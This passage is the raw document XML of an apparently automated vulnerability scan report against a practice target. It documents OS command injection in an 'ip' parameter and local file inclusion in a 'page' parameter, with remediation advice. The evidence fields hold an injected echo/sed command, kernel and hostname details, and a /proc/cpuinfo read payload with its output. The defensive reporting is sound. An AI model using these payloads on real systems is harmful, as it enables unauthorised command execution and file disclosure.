            <w:hyperlink r:id="rId27">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A3 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D002B35" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8689F0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666956D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F5D40" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.3 OS Command Injection </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2D11E63C" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09293440" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CC6201E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="27CAE076" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="454C59BA" wp14:editId="1D1B10CF">
                  <wp:extent cx="1397000" cy="1397000"/>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11ACD872" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22BA5DB2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="62A93D98" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EF85A4B"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3DB2D4C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8ACB0AA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64020CD3"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8">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/exec/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="59B912D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09A36EE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073A115F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="38B9292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C15D90B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D344147" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Body Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="19F4181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26D316F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220E4ED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Injected the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>echo ttp1739356543.6927|rev|sed -e 's/^/ptt/' -e 's/\./dot/'|tr a-z A-Z</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> command in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ip body parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and found the expected command output (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>PTT7296DOT3456539371PTT</w:t>
            </w:r>
            <w:r>
              <w:t>) in the response</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">To validate the vulnerability, we extracted the kernel version and the hostname of the Unix machine. The kernel version is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>5.10.0-32-amd64</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, and the hostname is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ba766be4f6cb</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId29">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="444D708A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="69E348D4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6DE008" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target web application can be manipulated into running operating system commands on its host machine. This vulnerability arises from the application improperly handling or sanitizing user input which reaches OS functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453865C7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA55917" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that an attacker can use the application to run OS commands with the privileges of the vulnerable application. This could lead (but not limited) to Remote Code Execution, Denial of Service, Sensitive Information Disclosure, Sensitive Information Deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25577A02" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0707A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>There are multiple ways to mitigate this attack:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> - avoid calling OS commands directly (use built-in library functions) - escape values added to OS commands specific to each OS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> - implement parametrization in conjunction with Input Validation (segregate data by command; implement Positive or whitelist input validation; White list Regular Expression)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>In order to provide Defense in Depth, we also recommend to allocate the lowest privileges to web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17B250" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E209787" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/Command_Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43620889" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22EE383A"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2CC1DC9B"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7EFD559" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D88DBA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3424D4A6" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2438FD74" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39600822" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId32">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-78</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="53AF978D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03FEA50C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0E6E70" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId33">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="08299B9B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1255E666" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0474994C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId34">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A3 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F43361E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107FE834" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FBDB6D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D917A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.4 Local File Inclusion </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="474312BD" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B62EDF4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4F9469" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="70FD7A20" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32609FAE" wp14:editId="3FDA9ED1">
                  <wp:extent cx="1397000" cy="1397000"/>
                  <wp:effectExtent l="0" t="0" r="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35AE7C9F" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7332B2E6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="7B062460" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01EFC272"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5FF73A8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6034B5B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="276EC7E4"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36">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/fi/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="782008C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A8D8944" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D7B3F9"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0EB2F45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FFCE83E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="246696C6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2A94ACA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25448E2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767CBE12"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We found a Local File Inclusion vulnerability in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>page query parameter</w:t>
            </w:r>
            <w:r>
              <w:t>.We managed to read the contents of two files.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">First, we tested for the vulnerability by injecting the payload: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>/proc/cpuinfo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. We extracted the data:Additionally, we validated the vulnerability by injecting the payload: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>processor : 0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>vendor_id : AuthenticAMD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>cpu family : 25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>model : 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>model name : AMD EPYC 7713 64-Core Processor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>stepping : 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>microcode : 0xa0011d1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>processor : 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>vendor_id : AuthenticAMD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>cpu family : 25</w:t>
            </w:r>
            <w:r>
              <w:t>. The extracted data was:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId37">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24B16E72" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="45E6E015" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F6935" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We have discovered that the target application is affected by Local File Inclusion (also known as LFI), usually caused by improper validation of input used in file handling functions. This vulnerability allows including files that are already locally present on the server, by exploiting the vulnerable inclusion procedures implemented in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3FF74" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBDFE1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that an attacker can manipulate the affected parameter in order to load and sometimes execute any locally stored file. This could lead to reading arbitrary files, code execution, Cross-Site Scripting, denial of service, sensitive information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58934E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7417E5A2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The most effective solution to eliminating file inclusion vulnerabilities is to avoid passing raw user-submitted input to any filesystem API. If this is not possible, the application can maintain a white list of files that may be included by the page, and then check to see if the user input matches against any of the entries in the white list. Any request containing an invalid identifier has to be rejected. In this way, there is no attack surface for malicious users to manipulate the path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D170EF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E66F0C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="373EDA41"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14038DDC"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0147C09D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B50813" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2E8D17B5" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6765DE67" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A11F913" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId39">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-22</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6DCA66FE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D3515E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E58274" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId40">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="158FF8F4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
